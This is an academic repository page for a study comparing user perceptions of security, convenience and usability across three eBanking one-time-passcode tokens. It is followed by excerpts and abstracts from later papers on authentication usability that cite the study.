Article

User perceptions of security, convenience and usability for ebanking authentication tokens

Authors:
To read the full-text of this research, you can request a copy directly from the authors.

Abstract

This research compared three different two-factor methods of eBanking authentication. Three devices employing incremental security layers in the generation of one time passcodes (OTPs) were compared in a repeated-measures, controlled experiment with 50 eBanking customers. Attitudes towards usability and usage logs were taken for each experience. Comparisons of the devices in terms of overall quality, security and convenience as perceived by participants were also recorded. There were significant differences between all three methods in terms of usability measures, perceived quality, convenience and security ratings – with the perceived security ratings following a reverse order to the other measures. Almost two thirds of the participant sample chose the device they perceived the least secure as their preference. Participants were asked to use their preferred method again and tended to find their chosen device more usable. This research illustrates the usability-security trade off, where convenience, quality and usability are sacrificed when increasing layers of security are required. In their preferences, customers were driven by their attitudes towards usability and convenience rather than their perceptions of security.

No full-text available

Request Full-text Paper PDF

To read the full-text of this research,
you can request a copy directly from the authors.

... Previous research has examined these issues from the perspective of the password problem as a memory problem (Adams and Sasse, 1999;Gaw and Felten, 2006;Grawemeyer and Johnson, 2011;Nelson and Vu, 2010;Wiedenbeck et al., 2005;Woods and Siponen, 2018;Vu et al., 2007); and from the perspective of the password problem being a security behavior issue as like any other security behavior (Crossler et al., 2013;Jenkins et al., 2014;Johnston et al., 2015;Pahnila et al., 2007;Vance et al., 2013;Workman et al., 2008). Through the first stream of research, studies have shown that there is a trade-off not only between memorability and security (Vu et al., 2007;), but also between password security and convenience (Bang et al., 2012;Tam et al., 2010;Weir et al., 2009). ...
... Issues with password memorability and forgetting passwords can be an expensive security issue, as well as lead to user inconvenience (Al-Ameen et al., 2015). Users are motivated by, and prioritize minimizing inconvenience over increasing security, and adapt their behavior accordingly (Duggan et al., 2012;Notoatmodjo and Thomborson, 2009;Tam et al., 2010;Weir et al., 2009). Moreover, password policy requirements increase the effort users expend on the password process (Inglesant and Sasse, 2010). ...
... 191). Therefore, more research is needed to examine the trade-off between convenience, memorability, and security (Hoonakker et al., 2009;Weir et al., 2009), when considering ways in which to increase these factors concurrently. ...
Article
Passwords are the most frequently used authentication mechanism. However, due to increased password numbers, there has been an increase in insecure password behaviors (e.g., password reuse). Therefore, new and innovative ways are needed to increase password memorability and security. Typically, users are asked to input their passwords once in order to access the system, and twice to verify the password, when they create a new account. But what if users were asked to input their passwords three or four times when they create new accounts? In this study, three groups of participants were asked to verify their passwords once (control group), twice, and three times (two experimental groups). Psychological literature suggests that applying repetition in learning to the password process has significant effects on password memorability. However, previous password research has found a trade-off between password security and memorability, and more recently, user convenience. Our results suggest that verifying passwords three times can increase password memorability from 42% (verifying passwords just once as with current practices) to 70%. Even by increasing the verification to just two times can increase password memorability by 17%. However, we found that through increasing the number of verifications did not equate to a decrease in user convenience. What this means is that small changes to the password verification stage can have significant results on password memorability while not necessarily inconveniencing the user. The implications of these results could ultimately have a positive effect on password security, and the consequences of forgetting passwords.
... Therefore, it is important to know the factors that impact the perceived usability and the perceived security of the authentication methods in online mobile banking before the deployment of a method for broader practice. However, there are few studies that focus on these underlying factors, and they were often conducted on small or student samples that limit the generalization to the wider population (e.g., Weir et al., 2009 ;Krol et al., 2015 ;Reese et al., 2019 ). To overcome this limitation, we collected data from two independent samples of smartphone users that together cover users aged 26 to 82. ...
... Most of them analysed token-based authentication that compared OTP 2 tokens with a display and a button to standard passwordbased authentication or a card-reader method. Weir et al. (2009) conducted a user study of online banking customers where participants evaluated three two-factor authentication methods (for login and transactions) in terms of usability, security, convenience, and preference. They found the push-button token to be the most usable method, but, at the same time, the participants perceived it to be the least secure. ...
... However, the authors did not provide details about this difference or the specific scores. On the other hand, Weir et al. (2009) , who evaluated three two-factor authentication methods for online banking, did not find any statistically significant difference in the security evaluation between men and women. ...
Article
Smartphone authentication is becoming a cornerstone security component, so it is necessary to have methods that are usable and secure to ensure adequate protection, especially for mobile banking. Though biometric authentication seems to be perceived as very usable by users, there is a lack of research to compare smartphone-based fingerprint verification to other authentication methods for mobile banking in terms of usability and perceived security. Using two independent samples, we conducted a study for a younger group aged 26-54 (N = 229) and an older group aged 55+ (N = 239) about their perceptions of the usability and security of four authentication methods: fingerprint, PIN, token, and card reader. All four methods were evaluated positively for both usability and security, with fingerprint verification evaluated as the most usable and the most secure method for mobile banking. Interestingly, none of our hypothesized predictors (i.e., age, gender, education, smartphone self-efficacy, smartphone security behaviour, knowledge of secure smartphone behaviour) was consistently related to how users perceive the usability and security of the examined methods. This suggests that smartphone users would be able to successfully adopt, and be quite satisfied with, any of the tested methods, regardless of demography or smartphone skills.
... To ease the burden on the user and make tools more userfriendly, researchers have studied usability [5,13], yet despite considerable research on the usability characteristics of various tools [8,15], the issue of incorporating usability characteristics seems to be of low priority for designers and providers of such tools. Furthermore, while several studies analyse different usability characteristics that can influence users towards adopting security tools [1,2,5,6,7,10], users' perspectives and their expectations are scarcely addressed. Thus, relative research identifies that further research is needed regarding "usable security" and "usable privacy", especially focusing on the user's perspective [4]. ...
... A limited stream of research studies users' attitudes and perceptions regarding the usability of technologies such as e-banking authentication systems, email authentication services, antispyware and encryption tools. Weir et al., asked users to use three different e-banking authentication mechanisms to measure their effectiveness, efficiency and satisfaction [6], concluding that users have different usability preferences for different mechanisms, e.g. users preferred the more efficient push button token (requiring fewer steps for authentication compared to the other two mechanisms), but regarded chip and PIN-Secured tokens as more secure. ...
... In another study where the usability of Tor interfaces was examined, understandability was described as users being aware of the tasks they must perform [12]. In Weir et al. [6], this usability characteristic was defined as know what to do next, with a slightly different meaning, referring in this case to the degree to which users knew how to generate the random number from the e-banking authentication mechanisms and apply it on the website for authentication. Efficiency problems are also reported by Herath et al. [10], who introduced responsiveness as a usability characteristic related to how much time the system takes to respond. ...
Conference Paper
Full-text available
Use of security and privacy tools is still limited for various reasons, including usability issues. This paper analyses usability characteristics of security and privacy tools by drawing on relevant literature and employing scenario-based questionnaires and interviews with 150 users to capture their views. Based on users’ feedback, we analyse the role of usability characteristics and identify critical issues such as transparency, control of personal data, design and accessibility and consistency. This paper provides insights into the multifaceted issue of usability of security tools from the users’ perspective and a comprehensive picture of users’ needs and expectations. Some of the findings of this study show that users regard as important that security and privacy tools incorporate usability characteristics relevant to installation, design and accessibility, control and automation, visible feedback, and locatable security settings. Furthermore, users encounter problems with understanding technical terms and report that the availability of tools among smartphones and operating systems is a usability issue.
... Thus, usability issues lead to a low adoption rate [5,32]. More specific, users perceive the duration of the current two-factor authentication procedures as too long [49] and they criticize the usage of non-personalized devices [48]. ...
... It has been shown that users prefer or choose devices that they already own over additional physical tokens [48]. Users also tend to choose devices for two-factor authentication based on their usability [49]. Ease-of-use, trustworthiness and the required cognitive effort were found as key aspects for defining the usability of two-factor authentication [13]. ...
... The high level of usability has several benefits for users, such as reduced error rate, minimized training requirements, improved acceptance and increased efficiency and productivity ( Bevan et al., 2005 ) and has a strong impact on user's with specific needs ( Kartakis and Stephanidis, 2010 ). Also, on the basis of two different research studies of eBanking conducted by Weir et al. (2009Weir et al. ( , 2010, it can be concluded that increased usability leads to poorer security and vice versa. Furthermore, the high level of usability is related with complexity. ...
... Convenience is also important factor in all commercial systems. Its importance is especially emphasized in eBanking services where convenience has higher priorities than security ( Centeno, 2004;Lichtenstein and Williamson, 2006;Weir et al., 2009 ). This factor is one of the principal motivations underlying user inclinations to use certain mobile authentication method. ...
Article
The trend of rapid evolutionary development of mobile technologies and the existence of different user's priorities are creating new challenges with regard to selection of multifactor authentication (MFA) solutions. This becomes even more challenging by creating a universal authentication framework (UAF). In order to cope with these challenges, this paper has proposed a Fishbone model and developed in form of the UAF which is based on a larger number of linguistic variables and a wider set of user's priorities such as security, usability, accessibility, pricing, complexity, privacy and convenience (SUAPCPC). In comparison to all other papers available in the literature, the Fishbone model provides numerical evaluation of MFA with the possibility of changing weighted criteria for the selected user priorities. In addition, the contributions of this model are twofold. For user's, to enable easier choice of MFA solution, for developers, to identify spots where a method or solution could be improved. For development of the Fishbone model, fuzzy methodology is used in form of a Fuzzy Expert System (FES) tool. Also, the block diagram and the basic modules of the Fishbone model architecture are given. The results of implementation of the Fishbone model in form of the UAF have showed that this model is applicable and very efficient in practice. Finally, the Fishbone model gives an ideal template in UAF at which user's priorities satisfy the best individual users’ solutions. The realization of this template presents challenge for all future developers of MFA solutions.
... A number of studies [6,21,41] have applied those measures to analyze MFA protocols and, in general, solutions for digital authentication. For instance, Weir et al. [41] applied them for the analysis of two-factor authentication protocols where effectiveness was assessed by checking task completion records and usage of help, efficiency by counting the time needed to complete the authentication process and satisfaction by questioning users immediately after they authenticated. ...
... A number of studies [6,21,41] have applied those measures to analyze MFA protocols and, in general, solutions for digital authentication. For instance, Weir et al. [41] applied them for the analysis of two-factor authentication protocols where effectiveness was assessed by checking task completion records and usage of help, efficiency by counting the time needed to complete the authentication process and satisfaction by questioning users immediately after they authenticated. The same usability metrics were used in [21], where a broader scope of MFA protocols was investigated. ...
Article
Full-text available
In recent years, the usage of online banking services has considerably increased. To protect the sensitive resources managed by these services against attackers, banks have started adopting Multi-Factor Authentication (MFA). To date, a variety of MFA solutions have been implemented by banks, leveraging different designs and features and providing a non-homogeneous level of security and user experience. Public and private authorities have defined laws and guidelines to guide the design of more secure and usable MFA solutions, but their influence on existing MFA implementations remains unclear. In this work, we present a latitudinal study on the adoption of MFA and the design choices made by banks operating in different countries. In particular, we evaluate the MFA solutions currently adopted in the banking sector in terms of (i) compliance with laws and best practices, (ii) robustness against attacks and (iii) complexity. We also investigate possible correlations between these criteria. Based on this study, we identify a number of lessons learned and open challenges.
... This paper helps to close the gap in the limited, existing 2FA usability literature, which examined only the login process, often did not directly observe participants or use ISO 9241-11 suggested measurements, and studied systems that were less widespread, and popular than applications such as Google and Facebook (Cristofare, Freudiger, & Norcie 2013;Weir, Douglas, Carruthers, & Jack, 2009;Gunson, Marshall, Morton, & Jack, 2011). ...
Article
Computer security experts recommend that people use two-factor authentication (2FA) on password protected systems to help keep hackers out. Providing two pieces of information to verify a person’s identity adds extra security to an account. However, it is not clear if the added security and procedures impact system usability. This paper aims to answer this question by assessing per ISO 9241-11’s suggested measurements the usability of Google’s optional 2FA methods. We found few differences across four different 2FA methods when comparing efficiency, effectiveness and satisfaction measures—illustrating that one method is not necessarily more or less usable then another. Overall, the measures indicated that the systems’ usability needed to be improved, especially with regard to the initial setup of 2FA. In conclusion, developers need to focus more attention on making 2FA easier and faster to use, especially since it is often optional for password users, yet makes accounts significantly more secure.
... When looking at what motivates users for act or ignore security warnings and advice, several studies point out that the most important factors are the perceived security/convenience trade-off and the perceived risk of pursuing potentially dangerous actions [20,43,51]. For instance, Fagan and Khan [20] show that most users who follow a security advice do so for security benefits, whereas those who do not follow it do so to avoid an inconvenience mostly related to the lack of time. ...
Conference Paper
Full-text available
Internet users can download software for their computers from app stores (e.g., Mac App Store and Windows Store) or from other sources, such as the developers' websites. Most Internet users in the US rely on the latter, according to our representative study, which makes them directly responsible for the content they download. To enable users to detect if the downloaded files have been corrupted, developers can publish a checksum together with the link to the program file; users can then manually verify that the checksum matches the one they obtain from the downloaded file. In this paper, we assess the prevalence of such behavior among the general Internet population in the US (N=2,000), and we develop easy-to-use tools for users and developers to automate both the process of checksum verification and generation. Specifically, we propose an extension to the recent W3C specification for sub-resource integrity in order to provide integrity protection for download links. Also, we develop an extension for the popular Chrome browser that computes and verifies checksums of downloaded files automatically, and an extension for the WordPress CMS that developers can use to easily attach checksums to their remote content. Our in situ experiments with 40participants demonstrate the usability and effectiveness issues of checksums verification, and shows user desirability for our extension.
... A growing number of sites promote the use of multi-factor au- Table 1: Universities originally selected for analysis thentication tools to remove passwords as a single fail point for accessing accounts, yet most implementations suffer from their own issues with usability and still require the use of passwords as one factor regardless of if they use biometrics [35], one time codes [10,21,46], or hardware tokens [20,32,45,9]. ...
Conference Paper
Full-text available
Passwords are the primary, most widely used single sign-on and multiple point authentication scheme adapted across the globe. Yet password policies vary greatly and there is little empirical research on how these policies impinge reuse. For our research, we studied the password policies of twenty-two universities and analyzed 1.3 billion email addresses and passwords obtained from Exploit.in and Anti-Public combination lists. We analyzed the potential for reuse by the students, staff, faculty, and other associated users for each of the universities' domains by checking whether the exposed credentials meet the specific requirements of each password policy. Through our analysis, we found several policy decisions adopted by educational institutions that may decrease security related to account credentials and make actionable recommendations for addressing these risks. Our goal is to mitigate the reuse of passwords by implementing updated policies to decrease the probability of credential exposure by a third party. Our recommendations can be generalized to improve the policies employed by any password-using organizations , especially with accounts that are deemed to be highly valued, ex. email providers, banks, or medical portals.
... Frequently, usability measurements are related with easiness of use and enjoyment [50]. Nevertheless, convenience, which is a usability concept, is rarely studied [51], particularly in the domain of TUIs [34]. Convenience is described as the degree to which using an interface is comfortable without excessive physical or mental effort and is connected with the easiness of use [52]. ...
Article
This study applies a mixed methods approach to analyze usability, collaboration, and playfulness aspects in introductory programming activities with tangible and graphical user interfaces of two groups of students (24 primary-scholars, 8–9yo; and 14 high-scholars, 12–13yo). The students had prior experience with the two interfaces, having used them in a previous study, a year earlier. In the present work, students started programming in dyads and used both interfaces (graphical - tangible) once again, but without scaffolding and user instructions. Initially, the students carried out programming tasks and then they were allowed to freely interact with the system and develop their programs in order to explore programming concepts on their own. Quantitative and qualitative analysis were based on Fun Toolkit survey, interviews, computer logs, and video records. Usability analysis focused on retention, error rate, and convenience and showed that although no difference between the two interfaces recorded, students’ perceived impression on retention was in favor of the tangible interface. Moreover, interaction with the tangible interface was perceived as more playful by all students and more appropriate for collaborative work by elder students and girls. Finally, gender effects regarding students’ preferences, mostly on the graphical interface, were recorded and analyzed.
... Second, educating users by taking an approach where security communication would be designed in such a way that it incorporates susceptibility, benefits and self-efficacy content could further increase protective security behavior. Many users that have high self-efficacy, often, may not be motivated to behave in a compliant way as they could argue that the security is not their concern but the concern of the organization [85]. Clearly, users often delegate security to their organization which are expected to take appropriate security measures [45]. ...
Chapter
Full-text available
This study is set out to examine the determinants that drive preventive/protective as well as abusive behaviors among employees in the context of information security by extending the health belief model - a model set out to explain and predict healthy behaviors in human beings. A field experiment, accompanied by online surveys in two financial organizations in the US and India is conducted, measuring employees’ actual security behaviors. We identified factors (perceived susceptibility, perceived barriers, and self-efficacy) that have the largest effect on employee’s security behaviors. We offer several theoretical contributions and implications for practice.
... However, tokens have traditionally relied on special-purpose hardware and consequently been more expensive to implement and deploy than other factors. In addition, usability benefits of tokens have traditionally been offset by the costs of having to carry and handle the tokens [22,29]. ...
Conference Paper
This paper introduces and evaluates collaborative authentication, or coauthentication, a single-factor technique in which multiple registered devices work together to authenticate a user. Coauthentication provides security benefits similar to those of multi-factor techniques, such as mitigating theft of any one authentication secret, without some of the inconveniences of multi-factor techniques, such as having to enter passwords or biometrics. Coauthentication provides additional security benefits, including: preventing phishing, replay, and man-in-the-middle attacks; basing authentications on high-entropy secrets that can be generated and updated automatically; and availability protections against, for example, device misplacement and denial-of-service attacks. Coauthentication is amenable to many applications, including m-out-of-n, continuous, group, shared-device, and anonymous authentications. The principal security properties of coauthentication have been formally verified in ProVerif, and implementations have performed efficiently compared to password-based authentication.
... Before the internet, a security problem would affect only a small number of computers, while the spreading rate was quite slow (Botha et al. 2009). Nowadays any security problem affects a large number of computers that are connected and the spread rate is very fast (Weir et al. 2009). As a result, more and more attention is paid to security since a lot of private and sensitive data are available in the internet (Zhao et al. 2008). ...
Article
Full-text available
Security is coming more and more in the spotlight of today's news. Several reasons have lead to this, like the maturity of computer technology, which gave access to more people to computer systems, and the evolution of the internet and computer networking in general. Security, as most technology issues, doesn't evolve in general directions, but follows the direction of technology innovation. This focused direction of security research creates a number of different trends that evolve during time. This study will focus on the trends that have been emerging lately and the implications they have in security management. Suggestions will be proposed in order to accommodate the forthcoming changes.
... SAFEST is smart and secure FTP application and it is a client/server architecture. It can provide users with a secure transfer of data and strong authentication protocol [4] [7] [20] [21]. Secure transfer meaning that the transferred data are encrypted, come from an authorized person signed with digital signature, and stored encrypted on the server. ...
Conference Paper
Full-text available
Nowadays, with the wide applications of distributed systems, web-based applications, and communications systems over the Internet for carrying data between users such as terminal client and computer/server or communications between different devices using a computer network, network security has become crucial requirement to ensure authentic received data during transmission. Authentication and encryption are basic procedures to ensure secure communications over a public network due to tamper-resistance and convenience in dealing with a password file. Most of the used protocols; HTTP, FTP, and SMTP of Internet applications use text stream that is more and more vulnerable to attacks. Encryption represents the main security for most computer applications. This work proposes enhanced secure actions for transferring data using FTP protocol by using a smart token. A smart token has the capabilities of the smart card, but more secured beside some interesting operations. A practical and secure user scheme, based on a smart token device, is proposed. A Secure Platform has been developed using implemented APIs and PKCS#11 as RSA standard interface. The proposed API is called SAFEST (Secure Actions for FTP Environment with Smart Token). SAFEST API wraps a standard protocol for implementing the communication between a token and the application using it. This API is a platform-independent, scalable to support more functionality, optimizing token usage and adding more security for accessing token objects. The smart token can process the cryptographic key operations on its own rather than on the host computer, which supports high-level platform independence. In addition, through the proposed SAFEST API, standard interfacing to such token devices from any vendor can be implemented through using PKCS#11 interfaces, developed by RSA labs.
... Guaranteeing secure and reliable transaction over untrusted channels is a classical branch of research in security. Traditional approaches to establish trust between front-end terminals and remote servers leverage (i) challenge-based proof-of-identity schemes (such as Bank of America's SiteKey [9,10]); (ii) additional personal devices (including mobile phones) [11,12,13]possibly enriched with (iii) biometric measurements [14] Again, the tradeoff between usability and security is still a matter of major concerns [16,17,18]. Unskilled people may not be able to deal with such devices, while in certain application scenarios (e.g., rural areas), personal devices might be not available. ...
Chapter
Nowadays, plenty of digital services are provided to citizens by means of terminals located in public unguarded places. In order to access the desired service, users, authenticate themselves by providing their credentials through such terminals. This approach opens up to the problem of fraudulent devices that could be installed in place of regular terminals to capture users’ confidential information. Indeed, despite the development of increasingly secure systems aiming at guaranteeing an acceptable security level, users are frequently unable to distinguish between terminals on which security measures are enforced (trusted terminals) and malicious terminals that pretend to be trusted.
... One of the issues includes usability while trying to achieve a higher level of security. Many user authentication system designs are tilted more toward the security aspect of it but users are driven more toward convenience and usability of the mobile device security mechanism (Weir et al., 2009). There should be a convenient level of trade-off between usability and security in the design of a convenient user authentication system (Schultz et al., 2001, Dourish and Redmiles, 2002, Braz et al., 2007. ...
Thesis
Full-text available
There has been tremendous growth of mobile devices, which includes mobile phones, tablets etc. in recent years. The use of mobile phone is more prevalent due to their increasing functionality and capacity. Most of the mobile phones available now are smart phones and better processing capability hence their deployment for processing large volume of information. The information contained in these smart phones need to be protected against unauthorised persons from getting hold of personal data. To verify a legitimate user before accessing the phone information, the user authentication mechanism should be robust enough to meet present security challenge. The present approach for user authentication is cumbersome and fails to consider the human factor. The point of entry mechanism is intrusive which forces users to authenticate always irrespectively of the time interval. The use of biometric is identified as a more reliable method for implementing a transparent and non-intrusive user authentication. Transparent authentication using biometrics provides the opportunity for more convenient and secure authentication over secret-knowledge or token-based approaches. The ability to apply biometrics in a transparent manner improves the authentication security by providing a reliable way for smart phone user authentication. As such, research is required to investigate new modalities that would easily operate within the constraints of a continuous and transparent authentication system. This thesis explores the use of bioelectrical signals and contextual information for non-intrusive approach for authenticating a user of a mobile device. From fusion of bioelectrical signals and context awareness information, three algorithms where created to discriminate subjects with overall Equal Error Rate (EER of 3.4%, 2.04% and 0.27% respectively. Based vii | P a g e on the analysis from the multi-algorithm implementation, a novel architecture is proposed using a multi-algorithm biometric authentication system for authentication a user of a smart phone. The framework is designed to be continuous, transparent with the application of advanced intelligence to further improve the authentication result. With the proposed framework, it removes the inconvenience of password/passphrase etc. memorability, carrying of token or capturing a biometric sample in an intrusive manner. The framework is evaluated through simulation with the application of a voting scheme. The simulation of the voting scheme using majority voting improved to the performance of the combine algorithm (security level 2) to FRR of 22% and FAR of 0%, the Active algorithm (security level 2) to FRR of 14.33% and FAR of 0% while the Non-active algorithm (security level 3) to FRR of 10.33% and FAR of 0%.
... While the security offered by TFA techniques is undoubtedly higher than traditional mechanisms based on credentials only, its adoption, optional in most of the cases, is still not diffused. Indeed, most users still prefer the single authentication shot, mainly because of the extra effort required by legacy TFA techniques, always requiring explicit user interactions and not suitable for blind or visually impaired users [51], [52]. These drawbacks have motivated significant efforts in the last years, both by industries and academia, to develop more usable TFA schemes, eventually requiring zero interactions from the user. ...
Preprint
Full-text available
Short-range audio channels have a few distinguishing characteristics: ease of use, low deployment costs, and easy to tune frequencies, to cite a few. Moreover, thanks to their seamless adaptability to the security context, many techniques and tools based on audio signals have been recently proposed. However, while the most promising solutions are turning into valuable commercial products, acoustic channels are increasingly used also to launch attacks against systems and devices, leading to security concerns that could thwart their adoption. To provide a rigorous, scientific, security-oriented review of the field, in this paper we survey and classify methods, applications, and use-cases rooted on short-range audio channels for the provisioning of security services---including Two-Factor Authentication techniques, pairing solutions, device authorization strategies, defense methodologies, and attack schemes. Moreover, we also point out the strengths and weaknesses deriving from the use of short-range audio channels. Finally, we provide open research issues in the context of short-range audio channels security, calling for contributions from both academia and industry.
... Thus, it is authenticated. 1 https://en.wikipedia.org/wiki/List of data breaches While the security offered by TFA techniques is undoubtedly higher than traditional mechanisms based on credentials only, its adoption, optional in most of the cases, is still not diffused. Indeed, most users still prefer the single authentication shot, mainly because of the extra effort required by legacy TFA techniques, always requiring explicit user interactions and not suitable for blind or visually impaired users [52], [53]. These drawbacks have motivated significant efforts in the last years, both by industries and academia, to develop more usable TFA schemes, eventually requiring zero interactions from the user. ...
Article
Full-text available
Short-range audio channels have appealing distinguishing characteristics: ease of use, low deployment costs, and easy to tune frequencies, to cite a few. Moreover, thanks to their seamless adaptability to the security context, many techniques and tools based on audio signals have been recently proposed. However, while the most promising solutions are turning into valuable commercial products, acoustic channels are also increasingly used to launch attacks against systems and devices, leading to security concerns that could thwart their adoption. To provide a rigorous, scientific, security-oriented review of the field, in this paper we survey and classify methods, applications, and use-cases rooted on short-range audio channels for the provisioning of security services—including Two-Factor Authentication techniques, pairing solutions, device authorization strategies, defense methodologies, and attack schemes. Moreover, we also point out the strengths and weaknesses deriving from the use of short-range audio channels. Finally, we provide open research issues in the context of short-range audio channels security, calling for contributions from both academia and industry.
... Another study found a more complex interaction between perceptions of usability, convenience, quality, and security across three different 2FA devices for online banking authentication. Most participants chose their preferred 2FA device based on perceptions of usability rather than security [29]. A small ethnographic study on smart card usage at a U.S. federal research institute reported similar results [20]. ...
Conference Paper
Despite the additional protection it affords, two-factor authentication (2FA) adoption reportedly remains low. To better understand 2FA adoption and its barriers, we observed the deployment of a 2FA system at Carnegie Mellon University (CMU). We explore user behaviors and opinions around adoption, surrounding a mandatory adoption deadline. Our results show that (a) 2FA adopters found it annoying, but fairly easy to use, and believed it made their accounts more secure; (b) experience with CMU Duo often led to positive perceptions, sometimes translating into 2FA adoption for other accounts; and, (c) the differences between users required to adopt 2FA and those who adopted voluntarily are smaller than expected. We also explore the relationship between different usage patterns and perceived usability, and identify user misconceptions, insecure practices, and design issues. We conclude with recommendations for large-scale 2FA deployments to maximize adoption, focusing on implementation design, use of adoption mandates, and strategic messaging.
... TAM is found to have sufficient explanatory power and the researcher can add more factors or moderators to improve it (Sun & Zhang, 2006). The current study model expands the TAM model and scope of the MBS adoption decision by combining five external latent variables such as perceived risk from perceived risk theory, Binioris, & Polychronopoulos, 2012;Law, 2007;Weir, Douglas, Carruthers, & Jack, 2009), privacy (Chen, 2013;Law, 2007;Mukhtar, 2015), and website usability (Aboobucker & Bao, 2018;Casaló, Flavián, & Guinaliu, 2008;Hasbullah et al., 2016). However, the researchers in all these studies have concentrated on the factors which hinder the MBS usage, no past studies have searched subjective norms, trust, risk, privacy, and website usability in one model together with an average impact that inhibits greatly the usage of MBS. ...
Article
Full-text available
Purpose The main objective of this study is to expand the technology acceptance model (TAM) by examining the factors affecting the adoption of mobile banking services by the customers of Palestin-ian banks and to design a comprehensive model based on TAM and TPB and additional constructs. Design/methodology/approach This study used the quantitative approach with cross sectional research design and a questionnaire as a data tool. From the six big cities in Palestine, we surveyed 1000 banking consumers. The samples include different characteristics. For construct relationship analysis this study applied partial least squares (PLS). Findings The study framework provides a complete view of mobile banking services. This framework takes into consideration more determinants for prediction than other studies on the adoption of innovations. The results of using this model managed to clarify nearly 77.4 percent of the dependent variable (intention to adopt mobile banking service) variation. This is a much greater value than those of the previous studies. Moreover, this study found that the perceived risk has a negative effect on consumers' intention to use mobile banking services. Attitude, facilitating conditions, perceived ease of use, website usability, and perceived trust were identified as the important variables that have a significant positive effect on the consumers' intention to use mobile banking services in Palestine. Originality/value-the findings can be used by financial institutions and banks to enhance the usage rate of consumers' adoption and to develop their strategies. JEL classification: B30, B31, B32
... In contrast, its monetary tokenization serves as a security measure to safeguard from unauthorized breaches. While studies seem to suggest that perceived convenience contributes to mobile payment adoption and perceived security requires further investigation (Lai et al., 2019;Weir, Douglas, Carruthers, & Jack, 2009), Burmeister (2015) stressed the importance of security over convenience. Still, little is known whether perceived convenience and perceived security should co-exist for mobile payment adoption or would be a trade-off with an inverse relationship. ...
Article
Full-text available
Integrating gamification into mobile payment platform incentivizes people to use digital alternatives for payment and could spur user-centric, platform-mediated interactions. This study examines the relationship between perceived convenience and perceived security on individual users’ intention to use a gamified mobile payment platform in Malaysia; a developing country envisioned to build a cashless society. The partial least square structural equation modeling (PLS-SEM) technique is employed on a final sample of 388 online users. The results show that perceived convenience has a strong but indirect effect on the intention to use. Perceived security has a strong and direct effect on intention to use and mediates the relationship between perceived convenience and intention to use. Furthermore, the reliability aspect of security is a top priority concern for users interested in using mobile payment. The multi-functional aspect of convenience is a top priority concern to attract users who are not interested in using mobile payment at first. The study discusses theoretical and practical implications for developing a dual strategy of ‘ensuring convenience’ and ‘assuring security’ to encourage the gamified mobile payment platform adoption in developing countries.
... Some of these studies deal with the effect of perceptual design features on perceived security. For instance, using different tokens for eBanking authentication, Weir et al. (2009) have found that the perceived security levels were rated as the highest for the PIN-secured token and lowest for push-button token. In the same way, visual features (e.g., color, layout of computer interfaces, and type of materials) affect the perception of trustworthiness in e-commerce (Kim & Moon, 1998). ...
Article
The feeling of security of your own home is given both by the minimization of the real risk of infringement and by the conditions for minimizing the psychological threats experienced by the user. This study investigates the impact of visual design factors on perceived security of security doors. Experiment 1 verified the effect of different security door models on perceived security. For each model, participants indicated the perceived security on a 7-point rating scale. In the second experiment, 308 naïve participants estimated the perceived security of the security doors with ten morphological modifications (asymmetry; curved edges; reduced colorfulness; rhomboid panels; relief mullions; nails; engraved texture; electronic lock; double lock; bronze door handle). The influence of visual design factors on perceived security was confirmed in experiment 1. The results also show that asymmetry, nails doors and electronic lock increase perceived security significantly. Finally, the findings in relation to the design of security door are discussed.
... MFA does solve this problem to a greater extent, but it also has a downside in terms of user inconvenience and time taken to log in. In MFA, users are asked to provide additional details in terms of one-time-password, security question, etc. during login which takes extra time to login and that in turn causes inconvenience to the end-user (Weir et al., 2009). With AI-enabled authentication, such problems could be avoided, thereby improving users' overall experience and bringing efficiency in service delivery of RPs. ...
Article
Full-text available
Purpose–This conceptual article’s primary aim is to identify the significant stakeholders of the digital identity system (DIS) and then highlight the impact of artificial intelligence (AI) on each of the identified stakeholders. It also recommends vital points that could be considered by policymakers while developing technology-related policies for effective DIS. Design/methodology/approach–This article uses stakeholder methodology and design theory (DT) as a primary theoretical lens along with the innovation diffusion theory (IDT) as a sub-theory. This article is based on the analysis of existing literature that mainly comprises academic literature, official reports, whitepapers and publicly available domain experts’ interviews. Findings–The study identified six significant stakeholders, i.e. government, citizens, infrastructure providers, identity providers (IdP), judiciary and relying parties (RPs) of the DIS from the secondary data.Also, the role of IdP becomes insignificant in the context of AI-enabled digital identity systems (AIeDIS). The findings depict that AIeDIS can positively impact the DIS stakeholders by solving a range of problems such as identity theft, unauthorised access and credential misuse, and will also open a possibility of new ways to empower all the stakeholders. Research limitations/implications–The study is based on secondary data and has considered DIS stakeholders from a generic perspective. Incorporating expert opinion and empirical validation of the hypothesis could derive more specific and context-aware insights. Practical implications–The study could facilitate stakeholders to enrich further their understanding and significance of developing sustainable and future-ready DIS by highlighting the impact of AI on the digital identity ecosystem. Originality/value–To the best of the authors’ knowledge, this article is the first of its kind that has used stakeholder theory, DT and IDT to explain the design and developmental phenomenon of AIeDIS. A list of six significant stakeholders of DIS, i.e. government, citizens, infrastructure providers, IdP, judiciary and RP, is identified through comprehensive literature analysis.
... It should cover several important aspects such as data privacy [1], data access and data integrity [2]. Various methods of data security such as Smart Card usage, Token, Key and biometric have been implemented to ensure the safety of the data in a system [3,4]. This article will explain the data security management using biometric methods. ...
Article
Full-text available
Computer security is a process that controls the entire information system, including network, system and hardware. Important information that must be controlled in a system is the data or information contained in a system. Various methods have been used to ensure that only users with legitimate access to data can use a system. Usernames and passwords have been a common practice by many systems as the first requirement to be fulfilled to access the system, but some systems use the secondary verification for additional confirmation. In this article, Keystroke Dynamics has been used as the user’s second level authentication for the systems that use the keyboard to login into a system. A common problem of system intrusions is that the system fails to identify the user who signs in using the keyboard when the login is correct. There is a possibility that someone else tries to break into the system. To ensure and improve users’ recognition who use the keyboard to enter their logins into the system, Keystroke Dynamics is used as a next-level verification if the login is correct. Soft biometrics is used in the user authentication process using KD method in this study. The soft biometric elements used in this study are culture, gender, educational level (CGPA - Cumulative Grade Point Average) and region of birth (ROB). All of these four soft biometric elements are expected to enhance capabilities in the user authentication process.
... Not each payment transaction is related to the same level of risk. There is also a common perception that usability and security are competing goals ( [38,39]), so it would be valuable to create the solution that will allow improving the usability of card-present payment transactions and will not destroy the security. ...
Article
Full-text available
